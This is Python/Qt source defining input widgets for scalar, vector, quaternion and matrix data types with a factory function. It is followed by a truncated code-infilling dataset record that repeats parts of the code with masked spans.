def __init__(self, parent=None, dataSetCallback=None, defaultValue=None, userStructClass=None, **kwds):
super(InputWidgetRaw, self).__init__(parent=parent, **kwds)
self._defaultValue = defaultValue
# fuction with signature void(object)
# this will set data to pin
self.dataSetCallback = dataSetCallback
def onResetValue(self):
self.setWidgetValue(self._defaultValue)
def setWidgetValue(self, value):
'''to widget'''
pass
def widgetValueUpdated(self, value):
'''from widget'''
pass
class InputWidgetSingle(InputWidgetRaw):
"""
This type of widget is used for a simple widgets like buttons, checkboxes etc.
It consists of horizontal layout widget itself and reset button.
"""
def __init__(self, parent=None, dataSetCallback=None, defaultValue=None, userStructClass=None, **kwds):
super(InputWidgetSingle, self).__init__(parent=parent, dataSetCallback=dataSetCallback, defaultValue=defaultValue, userStructClass=userStructClass, **kwds)
# from widget
self.bWidgetSet = False
self.gridLayout = QGridLayout(self)
self.gridLayout.setSpacing(1)
self.gridLayout.setContentsMargins(0, 0, 0, 0)
self.gridLayout.setObjectName("gridLayout")
self.horizontalLayout = QHBoxLayout()
self.horizontalLayout.setObjectName("horizontalLayout")
spacerItem = QSpacerItem(40, 20, QSizePolicy.Expanding, QSizePolicy.Minimum)
self.horizontalLayout.addItem(spacerItem)
self.pbReset = QPushButton(self)
self.pbReset.setMaximumSize(QtCore.QSize(25, 25))
self.pbReset.setText("")
self.pbReset.setObjectName("pbReset")
self.pbReset.setIcon(QtGui.QIcon(":/icons/resources/reset.png"))
self.horizontalLayout.addWidget(self.pbReset)
self.pbReset.clicked.connect(self.onResetValue)
self.gridLayout.addLayout(self.horizontalLayout, 0, 0, 1, 1)
self._index = 0
def setWidget(self, widget):
self.horizontalLayout.insertWidget(self._index, widget)
class ExecInputWidget(InputWidgetSingle):
"""docstring for ExecInputWidget"""
def __init__(self, parent=None, **kwds):
super(ExecInputWidget, self).__init__(parent=parent, **kwds)
self.pb = QPushButton('execute', self)
self.setWidget(self.pb)
self.pb.clicked.connect(self.dataSetCallback)
self.pbReset.deleteLater()
def setObjectName(self,name):
super(ExecInputWidget, self).setObjectName(name)
self.pb.setText(name.split(".")[-1])
class EnumInputWidget(InputWidgetSingle):
"""
Enum input widget
"""
def __init__(self, parent=None, **kwds):
super(EnumInputWidget, self).__init__(parent=parent, **kwds)
# self._userStruct = kwds['userStructClass']
self.cb = QComboBox(self)
self.setWidget(self.cb)
for i in list(kwds['userStructClass']):
self.cb.addItem(i.name, i.value)
self.cb.currentIndexChanged[int].connect(self.dataSetCallback)
def setWidgetValue(self, val):
self.cb.setCurrentIndex(val)
class FloatInputWidget(InputWidgetSingle):
"""
Floating point data input widget
"""
def __init__(self, parent=None, **kwds):
super(FloatInputWidget, self).__init__(parent=parent, **kwds)
self.sb = QDoubleSpinBox(self)
_configDoubleSpinBox(self.sb)
self.setWidget(self.sb)
# when spin box updated call setter function
self.sb.valueChanged.connect(lambda val: self.dataSetCallback(val))
def setWidgetValue(self, val):
self.sb.setValue(float(val))
class IntInputWidget(InputWidgetSingle):
"""
Decimal number input widget
"""
def __init__(self, parent=None, **kwds):
super(IntInputWidget, self).__init__(parent=parent, **kwds)
self.sb = QSpinBox(self)
_configIntSpinBox(self.sb)
self.setWidget(self.sb)
self.sb.valueChanged.connect(lambda val: self.dataSetCallback(val))
def setWidgetValue(self, val):
self.sb.setValue(int(val))
class NoneInputWidget(InputWidgetSingle):
"""
String data input widget
"""
def __init__(self, parent=None, **kwds):
super(NoneInputWidget, self).__init__(parent=parent, **kwds)
self.le = QLineEdit(self)
self.le.setContextMenuPolicy(QtCore.Qt.NoContextMenu)
self.setWidget(self.le)
self.le.textChanged.connect(lambda val: self.dataSetCallback(val))
self.le.setEnabled(False)
def setWidgetValue(self, val):
self.le.setText(str(val))
class StringInputWidget(InputWidgetSingle):
"""
String data input widget
"""
def __init__(self, parent=None, **kwds):
super(StringInputWidget, self).__init__(parent=parent, **kwds)
self.le = QLineEdit(self)
self.le.setContextMenuPolicy(QtCore.Qt.NoContextMenu)
self.setWidget(self.le)
self.le.textChanged.connect(lambda val: self.dataSetCallback(val))
def setWidgetValue(self, val):
self.le.setText(str(val))
class BoolInputWidget(InputWidgetSingle):
"""Boolean data input widget"""
def __init__(self, parent=None, **kwds):
super(BoolInputWidget, self).__init__(parent=parent, **kwds)
self.cb = QCheckBox(self)
self.setWidget(self.cb)
self.cb.stateChanged.connect(lambda val: self.dataSetCallback(bool(val)))
def setWidgetValue(self, val):
if bool(val):
self.cb.setCheckState(QtCore.Qt.Checked)
else:
self.cb.setCheckState(QtCore.Qt.Unchecked)
class FloatVector3InputWidget(InputWidgetRaw, FloatVector3InputWidget_ui.Ui_Form):
"""Vector3 data input widget"""
def __init__(self, **kwds):
super(FloatVector3InputWidget, self).__init__(**kwds)
self.setupUi(self)
self._configSpinBoxes()
self.dsbX.valueChanged.connect(self._onDataChangedX)
self.dsbY.valueChanged.connect(self._onDataChangedY)
self.dsbZ.valueChanged.connect(self._onDataChangedZ)
self.pbReset.clicked.connect(self.onResetValue)
def asDataTypeClass(self):
return pyrr.Vector3([self.dsbX.value(), self.dsbY.value(), self.dsbZ.value()])
def _configSpinBoxes(self):
self.dsbX.setDecimals(FLOAT_DECIMALS)
self.dsbY.setDecimals(FLOAT_DECIMALS)
self.dsbZ.setDecimals(FLOAT_DECIMALS)
self.dsbX.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)
self.dsbY.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)
self.dsbZ.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)
self.dsbX.setSingleStep(FLOAT_SINGLE_STEP)
self.dsbY.setSingleStep(FLOAT_SINGLE_STEP)
self.dsbZ.setSingleStep(FLOAT_SINGLE_STEP)
def _onDataChangedX(self, val):
v = self.asDataTypeClass()
v.x = val
self.dataSetCallback(v)
def _onDataChangedY(self, val):
v = self.asDataTypeClass()
v.y = val
self.dataSetCallback(v)
def _onDataChangedZ(self, val):
v = self.asDataTypeClass()
v.z = val
self.dataSetCallback(v)
def setWidgetValue(self, val):
self.dsbX.setValue(val.x)
self.dsbY.setValue(val.y)
self.dsbZ.setValue(val.z)
class FloatVector4InputWidget(InputWidgetRaw, FloatVector4InputWidget_ui.Ui_Form):
"""Vector4 data input widget"""
def __init__(self, **kwds):
super(FloatVector4InputWidget, self).__init__(**kwds)
self.setupUi(self)
self._configSpinBoxes()
self.dsbX.valueChanged.connect(self._onDataChangedX)
self.dsbY.valueChanged.connect(self._onDataChangedY)
self.dsbZ.valueChanged.connect(self._onDataChangedZ)
self.dsbW.valueChanged.connect(self._onDataChangedW)
self.pbReset.clicked.connect(self.onResetValue)
def asDataTypeClass(self):
return pyrr.Vector4([self.dsbX.value(), self.dsbY.value(), self.dsbZ.value(), self.dsbW.value()])
def _configSpinBoxes(self):
self.dsbX.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)
self.dsbY.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)
self.dsbZ.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)
self.dsbW.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)
self.dsbX.setSingleStep(FLOAT_SINGLE_STEP)
self.dsbY.setSingleStep(FLOAT_SINGLE_STEP)
self.dsbZ.setSingleStep(FLOAT_SINGLE_STEP)
self.dsbW.setSingleStep(FLOAT_SINGLE_STEP)
self.dsbX.setDecimals(FLOAT_DECIMALS)
self.dsbY.setDecimals(FLOAT_DECIMALS)
self.dsbZ.setDecimals(FLOAT_DECIMALS)
self.dsbW.setDecimals(FLOAT_DECIMALS)
def _onDataChangedX(self, val):
v = self.asDataTypeClass()
v.x = val
self.dataSetCallback(v)
def _onDataChangedY(self, val):
v = self.asDataTypeClass()
v.y = val
self.dataSetCallback(v)
def _onDataChangedZ(self, val):
v = self.asDataTypeClass()
v.z = val
self.dataSetCallback(v)
def _onDataChangedW(self, val):
v = self.asDataTypeClass()
v.w = val
self.dataSetCallback(v)
def setWidgetValue(self, val):
self.dsbX.setValue(val.x)
self.dsbY.setValue(val.y)
self.dsbZ.setValue(val.z)
self.dsbW.setValue(val.w)
class QuatInputWidget(FloatVector4InputWidget):
"""Quaternion data input widget"""
def __init__(self, **kwds):
super(QuatInputWidget, self).__init__(**kwds)
def asDataTypeClass(self):
return pyrr.Quaternion([self.dsbX.value(), self.dsbY.value(), self.dsbZ.value(), self.dsbW.value()])
class Matrix33InputWidget(InputWidgetRaw, Matrix33InputWidget_ui.Ui_Form):
"""Matrix33 data input widget"""
def __init__(self, parent=None, **kwds):
super(Matrix33InputWidget, self).__init__(parent=parent, **kwds)
self.setupUi(self)
self._configSpinBoxes()
self.dsbm11.valueChanged.connect(self.m11Changed)
self.dsbm12.valueChanged.connect(self.m12Changed)
self.dsbm13.valueChanged.connect(self.m13Changed)
self.dsbm21.valueChanged.connect(self.m21Changed)
self.dsbm22.valueChanged.connect(self.m22Changed)
self.dsbm23.valueChanged.connect(self.m23Changed)
self.dsbm31.valueChanged.connect(self.m31Changed)
self.dsbm32.valueChanged.connect(self.m32Changed)
self.dsbm33.valueChanged.connect(self.m33Changed)
self.pbReset.clicked.connect(self.onResetValue)
def asDataTypeClass(self):
return pyrr.Matrix33([
[self.dsbm11.value(), self.dsbm12.value(), self.dsbm13.value()],
[self.dsbm21.value(), self.dsbm22.value(), self.dsbm23.value()],
[self.dsbm31.value(), self.dsbm32.value(), self.dsbm33.value()]
])
def _configSpinBoxes(self):
ls = [self.dsbm11, self.dsbm12, self.dsbm13,
self.dsbm21, self.dsbm22, self.dsbm23,
self.dsbm31, self.dsbm32, self.dsbm33]
for sb in ls:
sb.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)
sb.setSingleStep(FLOAT_SINGLE_STEP)
sb.setDecimals(FLOAT_DECIMALS)
def m11Changed(self, val):
m = self.asDataTypeClass()
m.m11 = val
self.dataSetCallback(m)
def m12Changed(self, val):
m = self.asDataTypeClass()
m.m12 = val
self.dataSetCallback(m)
def m13Changed(self, val):
m = self.asDataTypeClass()
m.m13 = val
self.dataSetCallback(m)
def m21Changed(self, val):
m = self.asDataTypeClass()
m.m21 = val
self.dataSetCallback(m)
def m22Changed(self, val):
m = self.asDataTypeClass()
m.m22 = val
self.dataSetCallback(m)
def m23Changed(self, val):
m = self.asDataTypeClass()
m.m23 = val
self.dataSetCallback(m)
def m31Changed(self, val):
m = self.asDataTypeClass()
m.m31 = val
self.dataSetCallback(m)
def m32Changed(self, val):
m = self.asDataTypeClass()
m.m32 = val
self.dataSetCallback(m)
def m33Changed(self, val):
m = self.asDataTypeClass()
m.m33 = val
self.dataSetCallback(m)
def setWidgetValue(self, val):
self.dsbm11.setValue(val.m11)
self.dsbm12.setValue(val.m12)
self.dsbm13.setValue(val.m13)
self.dsbm21.setValue(val.m21)
self.dsbm22.setValue(val.m22)
self.dsbm23.setValue(val.m23)
self.dsbm31.setValue(val.m31)
self.dsbm32.setValue(val.m32)
self.dsbm33.setValue(val.m33)
class Matrix44InputWidget(InputWidgetRaw, Matrix44InputWidget_ui.Ui_Form):
"""Matrix44 data input widget"""
def __init__(self, parent=None, **kwds):
super(Matrix44InputWidget, self).__init__(parent=parent, **kwds)
self.setupUi(self)
self._configSpinBoxes()
self.dsbm11.valueChanged.connect(self.m11Changed)
self.dsbm12.valueChanged.connect(self.m12Changed)
self.dsbm13.valueChanged.connect(self.m13Changed)
self.dsbm14.valueChanged.connect(self.m14Changed)
self.dsbm21.valueChanged.connect(self.m21Changed)
self.dsbm22.valueChanged.connect(self.m22Changed)
self.dsbm23.valueChanged.connect(self.m23Changed)
self.dsbm24.valueChanged.connect(self.m24Changed)
self.dsbm31.valueChanged.connect(self.m31Changed)
self.dsbm32.valueChanged.connect(self.m32Changed)
self.dsbm33.valueChanged.connect(self.m33Changed)
self.dsbm34.valueChanged.connect(self.m34Changed)
self.dsbm41.valueChanged.connect(self.m41Changed)
self.dsbm42.valueChanged.connect(self.m42Changed)
self.dsbm43.valueChanged.connect(self.m43Changed)
self.dsbm44.valueChanged.connect(self.m44Changed)
self.pbReset.clicked.connect(self.onResetValue)
def asDataTypeClass(self):
return pyrr.Matrix44([
[self.dsbm11.value(), self.dsbm12.value(), self.dsbm13.value(), self.dsbm14.value()],
[self.dsbm21.value(), self.dsbm22.value(), self.dsbm23.value(), self.dsbm24.value()],
[self.dsbm31.value(), self.dsbm32.value(), self.dsbm33.value(), self.dsbm34.value()],
[self.dsbm41.value(), self.dsbm42.value(), self.dsbm43.value(), self.dsbm44.value()]
])
def _configSpinBoxes(self):
ls = [self.dsbm11, self.dsbm12, self.dsbm13, self.dsbm14,
self.dsbm21, self.dsbm22, self.dsbm23, self.dsbm24,
self.dsbm31, self.dsbm32, self.dsbm33, self.dsbm34,
self.dsbm41, self.dsbm42, self.dsbm43, self.dsbm44]
for sb in ls:
sb.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)
sb.setSingleStep(FLOAT_SINGLE_STEP)
sb.setDecimals(FLOAT_DECIMALS)
def m11Changed(self, val):
m = self.asDataTypeClass()
m.m11 = val
self.dataSetCallback(m)
def m12Changed(self, val):
m = self.asDataTypeClass()
m.m12 = val
self.dataSetCallback(m)
def m13Changed(self, val):
m = self.asDataTypeClass()
m.m13 = val
self.dataSetCallback(m)
def m14Changed(self, val):
m = self.asDataTypeClass()
m.m14 = val
self.dataSetCallback(m)
def m21Changed(self, val):
m = self.asDataTypeClass()
m.m21 = val
self.dataSetCallback(m)
def m22Changed(self, val):
m = self.asDataTypeClass()
m.m22 = val
self.dataSetCallback(m)
def m23Changed(self, val):
m = self.asDataTypeClass()
m.m23 = val
self.dataSetCallback(m)
def m24Changed(self, val):
m = self.asDataTypeClass()
m.m24 = val
self.dataSetCallback(m)
def m31Changed(self, val):
m = self.asDataTypeClass()
m.m31 = val
self.dataSetCallback(m)
def m32Changed(self, val):
m = self.asDataTypeClass()
m.m32 = val
self.dataSetCallback(m)
def m33Changed(self, val):
m = self.asDataTypeClass()
m.m33 = val
self.dataSetCallback(m)
def m34Changed(self, val):
m = self.asDataTypeClass()
m.m34 = val
self.dataSetCallback(m)
def m41Changed(self, val):
m = self.asDataTypeClass()
m.m41 = val
self.dataSetCallback(m)
def m42Changed(self, val):
m = self.asDataTypeClass()
m.m42 = val
self.dataSetCallback(m)
def m43Changed(self, val):
m = self.asDataTypeClass()
m.m43 = val
self.dataSetCallback(m)
def m44Changed(self, val):
m = self.asDataTypeClass()
m.m44 = val
self.dataSetCallback(m)
def setWidgetValue(self, val):
self.dsbm11.setValue(val.m11)
self.dsbm12.setValue(val.m12)
self.dsbm13.setValue(val.m13)
self.dsbm14.setValue(val.m14)
self.dsbm21.setValue(val.m21)
self.dsbm22.setValue(val.m22)
self.dsbm23.setValue(val.m23)
self.dsbm24.setValue(val.m24)
self.dsbm31.setValue(val.m31)
self.dsbm32.setValue(val.m32)
self.dsbm33.setValue(val.m33)
self.dsbm34.setValue(val.m34)
self.dsbm41.setValue(val.m41)
self.dsbm42.setValue(val.m42)
self.dsbm43.setValue(val.m43)
self.dsbm44.setValue(val.m44)
def getInputWidget(dataType, dataSetter, defaultValue, userStructClass):
'''
factory method
'''
if dataType == DataTypes.Float:
return FloatInputWidget(dataSetCallback=dataSetter, defaultValue=defaultValue)
if dataType == DataTypes.Int:
return IntInputWidget(dataSetCallback=dataSetter, defaultValue=defaultValue)
if dataType == DataTypes.String:
return StringInputWidget(dataSetCallback=dataSetter, defaultValue=defaultValue)
if dataType == DataTypes.Bool:
return BoolInputWidget(dataSetCallback=dataSetter, defaultValue=defaultValue)
if dataType == DataTypes.FloatVector3:
return FloatVector3InputWidget(dataSetCallback=dataSetter, defaultValue=defaultValue)
if dataType == DataTypes.FloatVector4:
return FloatVector4InputWidget(dataSetCallback=dataSetter, defaultValue=defaultValue)
if dataType == DataTypes.Quaternion:
return QuatInputWidget(dataSetCallback=dataSetter, defaultValue=defaultValue)
if dataType == DataTypes.Matrix33:
return Matrix33InputWidget(dataSetCallback=dataSetter, defaultValue=defaultValue)
if dataType == DataTypes.Matrix44:
return Matrix44InputWidget(dataSetCallback=dataSetter, defaultValue=defaultValue)
if dataType == DataTypes.Exec:
return ExecInputWidget(dataSetCallback=dataSetter, defaultValue=None)
if dataType == DataTypes.Enum:
return EnumInputWidget(dataSetCallback=dataSetter, defaultValue=defaultValue, userStructClass=userStructClass)
return NoneInputWidget(dataSetCallback=dataSetter, defaultValue=defaultValue)
|
flexible
|
{
"blob_id": "023dc23a5e649c2fbbb45ff577dffa3b5d2aac64",
"index": 7904,
"step-1": "<mask token>\n\n\nclass FloatVector3InputWidget(InputWidgetRaw, FloatVector3InputWidget_ui.\n Ui_Form):\n <mask token>\n\n def __init__(self, **kwds):\n super(FloatVector3InputWidget, self).__init__(**kwds)\n self.setupUi(self)\n self._configSpinBoxes()\n self.dsbX.valueChanged.connect(self._onDataChangedX)\n self.dsbY.valueChanged.connect(self._onDataChangedY)\n self.dsbZ.valueChanged.connect(self._onDataChangedZ)\n self.pbReset.clicked.connect(self.onResetValue)\n\n def asDataTypeClass(self):\n return pyrr.Vector3([self.dsbX.value(), self.dsbY.value(), self.\n dsbZ.value()])\n\n def _configSpinBoxes(self):\n self.dsbX.setDecimals(FLOAT_DECIMALS)\n self.dsbY.setDecimals(FLOAT_DECIMALS)\n self.dsbZ.setDecimals(FLOAT_DECIMALS)\n self.dsbX.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)\n self.dsbY.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)\n self.dsbZ.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)\n self.dsbX.setSingleStep(FLOAT_SINGLE_STEP)\n self.dsbY.setSingleStep(FLOAT_SINGLE_STEP)\n self.dsbZ.setSingleStep(FLOAT_SINGLE_STEP)\n\n def _onDataChangedX(self, val):\n v = self.asDataTypeClass()\n v.x = val\n self.dataSetCallback(v)\n\n def _onDataChangedY(self, val):\n v = self.asDataTypeClass()\n v.y = val\n self.dataSetCallback(v)\n\n def _onDataChangedZ(self, val):\n v = self.asDataTypeClass()\n v.z = val\n self.dataSetCallback(v)\n\n def setWidgetValue(self, val):\n self.dsbX.setValue(val.x)\n self.dsbY.setValue(val.y)\n self.dsbZ.setValue(val.z)\n\n\nclass FloatVector4InputWidget(InputWidgetRaw, FloatVector4InputWidget_ui.\n Ui_Form):\n \"\"\"Vector4 data input widget\"\"\"\n\n def __init__(self, **kwds):\n super(FloatVector4InputWidget, self).__init__(**kwds)\n self.setupUi(self)\n self._configSpinBoxes()\n self.dsbX.valueChanged.connect(self._onDataChangedX)\n self.dsbY.valueChanged.connect(self._onDataChangedY)\n self.dsbZ.valueChanged.connect(self._onDataChangedZ)\n self.dsbW.valueChanged.connect(self._onDataChangedW)\n self.pbReset.clicked.connect(self.onResetValue)\n\n def asDataTypeClass(self):\n return pyrr.Vector4([self.dsbX.value(), self.dsbY.value(), self.\n dsbZ.value(), self.dsbW.value()])\n\n def _configSpinBoxes(self):\n self.dsbX.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)\n self.dsbY.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)\n self.dsbZ.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)\n self.dsbW.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)\n self.dsbX.setSingleStep(FLOAT_SINGLE_STEP)\n self.dsbY.setSingleStep(FLOAT_SINGLE_STEP)\n self.dsbZ.setSingleStep(FLOAT_SINGLE_STEP)\n self.dsbW.setSingleStep(FLOAT_SINGLE_STEP)\n self.dsbX.setDecimals(FLOAT_DECIMALS)\n self.dsbY.setDecimals(FLOAT_DECIMALS)\n self.dsbZ.setDecimals(FLOAT_DECIMALS)\n self.dsbW.setDecimals(FLOAT_DECIMALS)\n\n def _onDataChangedX(self, val):\n v = self.asDataTypeClass()\n v.x = val\n self.dataSetCallback(v)\n\n def _onDataChangedY(self, val):\n v = self.asDataTypeClass()\n v.y = val\n self.dataSetCallback(v)\n\n def _onDataChangedZ(self, val):\n v = self.asDataTypeClass()\n v.z = val\n self.dataSetCallback(v)\n\n def _onDataChangedW(self, val):\n v = self.asDataTypeClass()\n v.w = val\n self.dataSetCallback(v)\n\n def setWidgetValue(self, val):\n self.dsbX.setValue(val.x)\n self.dsbY.setValue(val.y)\n self.dsbZ.setValue(val.z)\n self.dsbW.setValue(val.w)\n\n\nclass QuatInputWidget(FloatVector4InputWidget):\n \"\"\"Quaternion data input widget\"\"\"\n\n def __init__(self, **kwds):\n super(QuatInputWidget, self).__init__(**kwds)\n\n def asDataTypeClass(self):\n return pyrr.Quaternion([self.dsbX.value(), self.dsbY.value(), self.\n dsbZ.value(), self.dsbW.value()])\n\n\nclass Matrix33InputWidget(InputWidgetRaw, Matrix33InputWidget_ui.Ui_Form):\n \"\"\"Matrix33 data input widget\"\"\"\n\n def __init__(self, parent=None, **kwds):\n super(Matrix33InputWidget, self).__init__(parent=parent, **kwds)\n self.setupUi(self)\n self._configSpinBoxes()\n self.dsbm11.valueChanged.connect(self.m11Changed)\n self.dsbm12.valueChanged.connect(self.m12Changed)\n self.dsbm13.valueChanged.connect(self.m13Changed)\n self.dsbm21.valueChanged.connect(self.m21Changed)\n self.dsbm22.valueChanged.connect(self.m22Changed)\n self.dsbm23.valueChanged.connect(self.m23Changed)\n self.dsbm31.valueChanged.connect(self.m31Changed)\n self.dsbm32.valueChanged.connect(self.m32Changed)\n self.dsbm33.valueChanged.connect(self.m33Changed)\n self.pbReset.clicked.connect(self.onResetValue)\n\n def asDataTypeClass(self):\n return pyrr.Matrix33([[self.dsbm11.value(), self.dsbm12.value(),\n self.dsbm13.value()], [self.dsbm21.value(), self.dsbm22.value(),\n self.dsbm23.value()], [self.dsbm31.value(), self.dsbm32.value(),\n self.dsbm33.value()]])\n\n def _configSpinBoxes(self):\n ls = [self.dsbm11, self.dsbm12, self.dsbm13, self.dsbm21, self.\n dsbm22, self.dsbm23, self.dsbm31, self.dsbm32, self.dsbm33]\n for sb in ls:\n sb.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)\n sb.setSingleStep(FLOAT_SINGLE_STEP)\n sb.setDecimals(FLOAT_DECIMALS)\n\n def m11Changed(self, val):\n m = self.asDataTypeClass()\n m.m11 = val\n self.dataSetCallback(m)\n\n def m12Changed(self, val):\n m = self.asDataTypeClass()\n m.m12 = val\n self.dataSetCallback(m)\n\n def m13Changed(self, val):\n m = self.asDataTypeClass()\n m.m13 = val\n self.dataSetCallback(m)\n\n def m21Changed(self, val):\n m = self.asDataTypeClass()\n m.m21 = val\n self.dataSetCallback(m)\n\n def m22Changed(self, val):\n m = self.asDataTypeClass()\n m.m22 = val\n self.dataSetCallback(m)\n\n def m23Changed(self, val):\n m = self.asDataTypeClass()\n m.m23 = val\n self.dataSetCallback(m)\n\n def m31Changed(self, val):\n m = self.asDataTypeClass()\n m.m31 = val\n self.dataSetCallback(m)\n\n def m32Changed(self, val):\n m = self.asDataTypeClass()\n m.m32 = val\n self.dataSetCallback(m)\n\n def m33Changed(self, val):\n m = self.asDataTypeClass()\n m.m33 = val\n self.dataSetCallback(m)\n\n def setWidgetValue(self, val):\n self.dsbm11.setValue(val.m11)\n self.dsbm12.setValue(val.m12)\n self.dsbm13.setValue(val.m13)\n self.dsbm21.setValue(val.m21)\n self.dsbm22.setValue(val.m22)\n self.dsbm23.setValue(val.m23)\n self.dsbm31.setValue(val.m31)\n self.dsbm32.setValue(val.m32)\n self.dsbm33.setValue(val.m33)\n\n\nclass Matrix44InputWidget(InputWidgetRaw, Matrix44InputWidget_ui.Ui_Form):\n \"\"\"Matrix44 data input widget\"\"\"\n\n def __init__(self, parent=None, **kwds):\n super(Matrix44InputWidget, self).__init__(parent=parent, **kwds)\n self.setupUi(self)\n self._configSpinBoxes()\n self.dsbm11.valueChanged.connect(self.m11Changed)\n self.dsbm12.valueChanged.connect(self.m12Changed)\n self.dsbm13.valueChanged.connect(self.m13Changed)\n self.dsbm14.valueChanged.connect(self.m14Changed)\n self.dsbm21.valueChanged.connect(self.m21Changed)\n self.dsbm22.valueChanged.connect(self.m22Changed)\n self.dsbm23.valueChanged.connect(self.m23Changed)\n self.dsbm24.valueChanged.connect(self.m24Changed)\n self.dsbm31.valueChanged.connect(self.m31Changed)\n self.dsbm32.valueChanged.connect(self.m32Changed)\n self.dsbm33.valueChanged.connect(self.m33Changed)\n self.dsbm34.valueChanged.connect(self.m34Changed)\n self.dsbm41.valueChanged.connect(self.m41Changed)\n self.dsbm42.valueChanged.connect(self.m42Changed)\n self.dsbm43.valueChanged.connect(self.m43Changed)\n self.dsbm44.valueChanged.connect(self.m44Changed)\n self.pbReset.clicked.connect(self.onResetValue)\n\n def asDataTypeClass(self):\n return pyrr.Matrix44([[self.dsbm11.value(), self.dsbm12.value(),\n self.dsbm13.value(), self.dsbm14.value()], [self.dsbm21.value(),\n self.dsbm22.value(), self.dsbm23.value(), self.dsbm24.value()],\n [self.dsbm31.value(), self.dsbm32.value(), self.dsbm33.value(),\n self.dsbm34.value()], [self.dsbm41.value(), self.dsbm42.value(),\n self.dsbm43.value(), self.dsbm44.value()]])\n\n def _configSpinBoxes(self):\n ls = [self.dsbm11, self.dsbm12, self.dsbm13, self.dsbm14, self.\n dsbm21, self.dsbm22, self.dsbm23, self.dsbm24, self.dsbm31,\n self.dsbm32, self.dsbm33, self.dsbm34, self.dsbm41, self.dsbm42,\n self.dsbm43, self.dsbm44]\n for sb in ls:\n sb.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)\n sb.setSingleStep(FLOAT_SINGLE_STEP)\n sb.setDecimals(FLOAT_DECIMALS)\n\n def m11Changed(self, val):\n m = self.asDataTypeClass()\n m.m11 = val\n self.dataSetCallback(m)\n\n def m12Changed(self, val):\n m = self.asDataTypeClass()\n m.m12 = val\n self.dataSetCallback(m)\n\n def m13Changed(self, val):\n m = self.asDataTypeClass()\n m.m13 = val\n self.dataSetCallback(m)\n\n def m14Changed(self, val):\n m = self.asDataTypeClass()\n m.m14 = val\n self.dataSetCallback(m)\n\n def m21Changed(self, val):\n m = self.asDataTypeClass()\n m.m21 = val\n self.dataSetCallback(m)\n\n def m22Changed(self, val):\n m = self.asDataTypeClass()\n m.m22 = val\n self.dataSetCallback(m)\n\n def m23Changed(self, val):\n m = self.asDataTypeClass()\n m.m23 = val\n self.dataSetCallback(m)\n\n def m24Changed(self, val):\n m = self.asDataTypeClass()\n m.m24 = val\n self.dataSetCallback(m)\n\n def m31Changed(self, val):\n m = self.asDataTypeClass()\n m.m31 = val\n self.dataSetCallback(m)\n\n def m32Changed(self, val):\n m = self.asDataTypeClass()\n m.m32 = val\n self.dataSetCallback(m)\n\n def m33Changed(self, val):\n m = self.asDataTypeClass()\n m.m33 = val\n self.dataSetCallback(m)\n\n def m34Changed(self, val):\n m = self.asDataTypeClass()\n m.m34 = val\n self.dataSetCallback(m)\n\n def m41Changed(self, val):\n m = self.asDataTypeClass()\n m.m41 = val\n self.dataSetCallback(m)\n\n def m42Changed(self, val):\n m = self.asDataTypeClass()\n m.m42 = val\n self.dataSetCallback(m)\n\n def m43Changed(self, val):\n m = self.asDataTypeClass()\n m.m43 = val\n self.dataSetCallback(m)\n\n def m44Changed(self, val):\n m = self.asDataTypeClass()\n m.m44 = val\n self.dataSetCallback(m)\n\n def setWidgetValue(self, val):\n self.dsbm11.setValue(val.m11)\n self.dsbm12.setValue(val.m12)\n self.dsbm13.setValue(val.m13)\n self.dsbm14.setValue(val.m14)\n self.dsbm21.setValue(val.m21)\n self.dsbm22.setValue(val.m22)\n self.dsbm23.setValue(val.m23)\n self.dsbm24.setValue(val.m24)\n self.dsbm31.setValue(val.m31)\n self.dsbm32.setValue(val.m32)\n self.dsbm33.setValue(val.m33)\n self.dsbm34.setValue(val.m34)\n self.dsbm41.setValue(val.m41)\n self.dsbm42.setValue(val.m42)\n self.dsbm43.setValue(val.m43)\n self.dsbm44.setValue(val.m44)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass FloatVector3InputWidget(InputWidgetRaw, FloatVector3InputWidget_ui.\n Ui_Form):\n \"\"\"Vector3 data input widget\"\"\"\n\n def __init__(self, **kwds):\n super(FloatVector3InputWidget, self).__init__(**kwds)\n self.setupUi(self)\n self._configSpinBoxes()\n self.dsbX.valueChanged.connect(self._onDataChangedX)\n self.dsbY.valueChanged.connect(self._onDataChangedY)\n self.dsbZ.valueChanged.connect(self._onDataChangedZ)\n self.pbReset.clicked.connect(self.onResetValue)\n\n def asDataTypeClass(self):\n return pyrr.Vector3([self.dsbX.value(), self.dsbY.value(), self.\n dsbZ.value()])\n\n def _configSpinBoxes(self):\n self.dsbX.setDecimals(FLOAT_DECIMALS)\n self.dsbY.setDecimals(FLOAT_DECIMALS)\n self.dsbZ.setDecimals(FLOAT_DECIMALS)\n self.dsbX.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)\n self.dsbY.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)\n self.dsbZ.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)\n self.dsbX.setSingleStep(FLOAT_SINGLE_STEP)\n self.dsbY.setSingleStep(FLOAT_SINGLE_STEP)\n self.dsbZ.setSingleStep(FLOAT_SINGLE_STEP)\n\n def _onDataChangedX(self, val):\n v = self.asDataTypeClass()\n v.x = val\n self.dataSetCallback(v)\n\n def _onDataChangedY(self, val):\n v = self.asDataTypeClass()\n v.y = val\n self.dataSetCallback(v)\n\n def _onDataChangedZ(self, val):\n v = self.asDataTypeClass()\n v.z = val\n 